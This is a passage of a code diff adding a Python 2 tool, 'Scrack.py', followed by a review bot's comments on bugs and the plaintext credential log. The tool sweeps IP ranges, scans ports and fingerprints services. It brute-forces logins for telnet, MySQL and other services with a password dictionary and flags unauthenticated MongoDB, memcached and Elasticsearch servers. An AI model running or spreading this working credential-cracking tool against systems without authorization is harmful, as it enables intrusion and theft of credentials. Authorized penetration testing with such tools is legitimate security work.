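+data = binascii.a2b_hex("3a000000a741000000000000d40700000000000061646d696e2e24636d640000000000ffffffff130000001069736d6173746572000100000000")
+s.send(data)
+result = s.recv(1024)
+if "ismaster" in result:
+getlog_data = binascii.a2b_hex("480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000")
+s.send(getlog_data)
+result = s.recv(1024)
+if "totalLinesWritten" in result:
+return "unauthorized"
+else:return 3
+except Exception,e:
+return 3
+def memcached(self,user,pass_):
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((self.ip,int(self.port)))
+s.send("stats\r\n")
+result = s.recv(1024)
+if "version" in result:
+return "unauthorized"
+def elasticsearch(self,user,pass_):
+url = "http://"+self.ip+":"+str(self.port)+"/_cat"
+data = urllib2.urlopen(url).read()
+if '/_cat/master' in data:
+return "unauthorized"
+else:
+return 3
+def telnet(self,user,pass_):
+try:
+tn = telnetlib.Telnet(self.ip,self.port,self.timeout)
+#tn.set_debuglevel(3)
+time.sleep(0.5)
+os = tn.read_some()
+except Exception ,e:
+return 3
+user_match="(?i)(login|user|username)"
+pass_match='(?i)(password|pass)'
+login_match='#|\$|>'
+if re.search(user_match,os):
+try:
+tn.write(str(user)+'\r\n')
+tn.read_until(pass_match,timeout=2)
+tn.write(str(pass_)+'\r\n')
+login_info=tn.read_until(login_match,timeout=3)
+tn.close()
+if re.search(login_match,login_info):
+return "username:%s,password:%s" % (user,pass_)
+except Exception,e:
+pass
+else:
+try:
+info=tn.read_until(user_match,timeout=2)
+except Exception,e:
+return 3
+if re.search(user_match,info):
+try:
+tn.write(str(user)+'\r\n')
+tn.read_until(pass_match,timeout=2)
+tn.write(str(pass_)+'\r\n')
+login_info=tn.read_until(login_match,timeout=3)
+tn.close()
+if re.search(login_match,login_info):
+return "username:%s,password:%s" % (user,pass_)
+except Exception,e:
+return 3
+elif re.search(pass_match,info):
+tn.read_until(pass_match,timeout=2)
+tn.write(str(pass_)+'\r\n')
+login_info=tn.read_until(login_match,timeout=3)
+tn.close()
+if re.search(login_match,login_info):
+return "password:%s" % (pass_)
+def get_hash(self,password, scramble):
+hash_stage1 = hashlib.sha1(password).digest()
+hash_stage2 = hashlib.sha1(hash_stage1).digest()
+to = hashlib.sha1(scramble+hash_stage2).digest()
+reply = [ord(h1) ^ ord(h3) for (h1, h3) in zip(hash_stage1, to)]
+hash = struct.pack('20B', *reply)
+return hash
+def get_scramble(self,packet):
+scramble,plugin = '',''
+try:
+tmp = packet[15:]
+m = re.findall("\x00?([\x01-\x7F]{7,})\x00", tmp)
+if len(m)>3:del m[0]
+scramble = m[0] + m[1]
+except:
+return '',''
+try:
+plugin = m[2]
+except:
+pass
+return plugin,scramble
+def get_auth_data(self,user,password,scramble,plugin):
+user_hex = binascii.b2a_hex(user)
+pass_hex = binascii.b2a_hex(self.get_hash(password,scramble))
+data = "85a23f0000000040080000000000000000000000000000000000000000000000" + user_hex + "0014" + pass_hex
+if plugin:data+=binascii.b2a_hex(plugin)+ "0055035f6f73076f737831302e380c5f636c69656e745f6e616d65086c69626d7973716c045f7069640539323330360f5f636c69656e745f76657273696f6e06352e362e3231095f706c6174666f726d067838365f3634"
+len_hex = hex(len(data)/2).replace("0x","")
+auth_data = len_hex + "000001" +data
+return binascii.a2b_hex(auth_data)
+def make_response(self,buf,username,password,salt):
+pu=hashlib.md5(password+username).hexdigest()
+buf=hashlib.md5(pu+salt).hexdigest()
+return 'md5'+buf
+class SendPingThr(threading.Thread):
+def __init__(self, ipPool, icmpPacket, icmpSocket, timeout=3):
+threading.Thread.__init__(self)
+self.Sock = icmpSocket
+self.ipPool = ipPool
+self.packet = icmpPacket
+self.timeout = timeout
+self.Sock.settimeout(timeout + 1)
+def run(self):
+time.sleep(0.01)
+for ip in self.ipPool:
+try:
+self.Sock.sendto(self.packet, (ip, 0))
+except socket.timeout:
+break
+time.sleep(self.timeout)
+class Nscan:
+def __init__(self, timeout=3):
+self.timeout = timeout
+self.__data = struct.pack('d', time.time())
+self.__id = os.getpid()
+if self.__id >= 65535:self.__id = 65534
+@property
+def __icmpSocket(self):
+Sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname("icmp"))
+return Sock
+def __inCksum(self, packet):
+if len(packet) & 1:
+packet = packet + '\0'
+words = array.array('h', packet)
+sum = 0
+for word in words:
+sum += (word & 0xffff)
+sum = (sum >> 16) + (sum & 0xffff)
+sum = sum + (sum >> 16)
+return (~sum) & 0xffff
+@property
+def __icmpPacket(self):
+header = struct.pack('bbHHh', 8, 0, 0, self.__id, 0)
+packet = header + self.__data
+chkSum = self.__inCksum(packet)
+header = struct.pack('bbHHh', 8, 0, chkSum, self.__id, 0)
+return header + self.__data
+def mPing(self, ipPool):
+Sock = self.__icmpSocket
+Sock.settimeout(self.timeout)
+packet = self.__icmpPacket
+recvFroms = set()
+sendThr = SendPingThr(ipPool, packet, Sock, self.timeout)
+sendThr.start()
+while True:
+try:
+ac_ip = Sock.recvfrom(1024)[1][0]
+if ac_ip not in recvFroms:
+log("active",ac_ip,0,None)
+recvFroms.add(ac_ip)
+except Exception:
+pass
+finally:
+if not sendThr.isAlive():
+break
+return recvFroms & ipPool
+def get_ac_ip(ip_list):
+try:
+s = Nscan()
+ipPool = set(ip_list)
+return s.mPing(ipPool)
+except Exception,e:
+print 'The current user permissions unable to send icmp packets'
+return ip_list
+class ThreadNum(threading.Thread):
+def __init__(self,queue):
+threading.Thread.__init__(self)
+self.queue = queue
+def run(self):
+while True:
+try:
+if queue.empty():break
+queue_task = self.queue.get()
+except:
+break
+try:
+task_type,task_host,task_port = queue_task.split(":")
+if task_type == 'portscan':
+data = scan_port(task_host,task_port)
+if data:
+server_name = server_discern(task_host,task_port,data)
+if server_name:
+log('discern',task_host,task_port,server_name)
+queue.put(":".join([server_name,task_host,task_port]))
+else:
+result = pass_crack(task_type,task_host,task_port)
+if result and result !=3:log(task_type,task_host,task_port,result)
+except Exception,e:
+continue
+def scan_port(host,port):
+try:
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect((str(host),int(port)))
+log('portscan',host,port)
+except Exception,e:
+return False
+try:
+data = sock.recv(512)
+if len(data) > 2:
+return data
+else:
+sock.send('a\n\n')
+data = sock.recv(512)
+sock.close()
+if len(data) > 2:
+return data
+else:
+return 'NULL'
+except Exception,e:
+sock.close()
+return 'NULL'
+def log(scan_type,host,port,info=''):
+mutex.acquire()
+time_str = time.strftime('%X', time.localtime( time.time()))
+if scan_type == 'portscan':
+print "[%s] %s:%d open"%(time_str,host,int(port))
+elif scan_type == 'discern':
+print "[%s] %s:%d is %s"%(time_str,host,int(port),info)
+elif scan_type == 'active':
+print "[%s] %s active" % (time_str, host)
+elif info:
+log = "[*%s] %s:%d %s %s"%(time_str,host,int(port),scan_type,info)
+print log
+log_file = open('result.log','a')
+log_file.write(log+"\r\n")
+log_file.close()
+mutex.release()
+def server_discern(host,port,data):
+for mark_info in REGEX:
+try:
+name,default_port,reg = mark_info
+if reg and data <> 'NULL':
+matchObj = re.search(reg,data,re.I|re.M)
+if matchObj:
+return name
+elif int(default_port) == int(port):
+return name
+except Exception,e:
+#print e
+continue
+def pass_crack(server_type,host,port):
+m = Crack(host,port,server_type,TIMEOUT)
+return m.run()
+def get_password_dic(path):
+pass_list = []
+try:
+file_ = open(path,'r')
+for password in file_:
+pass_list.append(password.strip())
+file_.close()
+return pass_list
+except:
+return 'read dic error'
+def get_ip_list(ip):
+ip_list = []
+iptonum = lambda x:sum([256**j*int(i) for j,i in enumerate(x.split('.')[::-1])])
+numtoip = lambda x: '.'.join([str(x/(256**i)%256) for i in range(3,-1,-1)])
+if '-' in ip:
+ip_range = ip.split('-')
+ip_start = long(iptonum(ip_range[0]))
+ip_end = long(iptonum(ip_range[1]))
+ip_count = ip_end - ip_start
+if ip_count >= 0 and ip_count <= 65536:
+for ip_num in range(ip_start,ip_end+1):
+ip_list.append(numtoip(ip_num))
+else:
+print '-h wrong format'
+elif '.ini' in ip:
+ip_config = open(ip,'r')
+for ip in ip_config:
+ip_list.extend(get_ip_list(ip.strip()))
+ip_config.close()
+else:
+ip_split=ip.split('.')
+net = len(ip_split)
+if net == 2:
+for b in range(1,255):
+for c in range(1,255):
+ip = "%s.%s.%d.%d"%(ip_split[0],ip_split[1],b,c)
+ip_list.append(ip)
+elif net == 3:
+for c in range(1,255):
+ip = "%s.%s.%s.%d"%(ip_split[0],ip_split[1],ip_split[2],c)
+ip_list.append(ip)
+elif net ==4:
+ip_list.append(ip)
+else:
+print "-h wrong format"
+return ip_list
+def t_join(m_count):
+tmp_count = 0
+i = 0
+if I < m_count:
+count = len(ip_list) + 1
+else:
+count = m_count
+while True:
+time.sleep(4)
+ac_count = threading.activeCount()
+#print ac_count,count
+if ac_count < count and ac_count == tmp_count:
+i+=1
+else:
+i=0
+tmp_count = ac_count
+#print ac_count,queue.qsize()
+if (queue.empty() and threading.activeCount() <= 1) or i > 5:
+break
+def put_queue(ip_list,port_list):
+for ip in ip_list:
+for port in port_list:
+queue.put(":".join(['portscan',ip,port]))
+if __name__=="__main__":
+msg = '''
+Usage: python Scrack.py -h 192.168.1 [-p 21,80,3306] [-m 50] [-t 10] [-d pass.txt] [-n]
+'''
+if len(sys.argv) < 2:
+print msg
+try:
+options,args = getopt.getopt(sys.argv[1:],"h:p:m:t:d:n")
+ip = ''
+port = '21,23,1433,3306,5432,6379,9200,11211,27017'
+m_count = 100
+ping = True
+for opt,arg in options:
+if opt == '-h':
+ip = arg
+elif opt == '-p':
+port = arg
+elif opt == '-m':
+m_count = int(arg)
+elif opt == '-t':
+TIMEOUT = int(arg)
+elif opt == '-n':
+ping = False
+elif opt == '-d':
+PASSWORD_DIC = get_password_dic(arg)
+socket.setdefaulttimeout(TIMEOUT)
+if ip:
+ip_list = get_ip_list(ip)
+if ping:ip_list = get_ac_ip(ip_list)
+port_list = port.split(',')
+for ip_str in ip_list:
+for port_int in port_list:
+I+=1
+queue.put(':'.join(['portscan',ip_str,port_int]))
+for i in range(m_count):
+t = ThreadNum(queue)
+t.setDaemon(True)
+t.start()
+t_join(m_count)
+except Exception,e:
+print msg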
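Review bot: log() holds `mutex` across `open('result.log','a')` with no try/finally, so a failed open (read-only directory, disk full) propagates with the lock still held and every ThreadNum worker then blocks on its next log call; `with mutex:` around the body makes the release unconditional, and the local `log = "..."` inside the function shadows the function's own name. scan_port returns on the first `len(data) > 2` branch without closing `sock`, and the mysql, memcached and elasticsearch methods of Crack never close theirs either, so a wide scan leaks one descriptor per responsive port until the process hits its fd limit. result.log accumulates recovered credentials in plaintext in the working directory and is appended to across runs without ever being truncated; the README's authorized-use notice is worth repeating in a module docstring here, together with a note that the file holds secrets and must be protected or deleted when the engagement ends. The main block catches Exception and prints only the usage string, so a bad dictionary path (get_password_dic returns the string 'read dic error' instead of raising) or a permission error is indistinguishable from a malformed flag — printing `e` alongside `msg` would help. The `__main__` block appears to end at the last line shown; if the file continues past this chunk, these notes cover only the visible part.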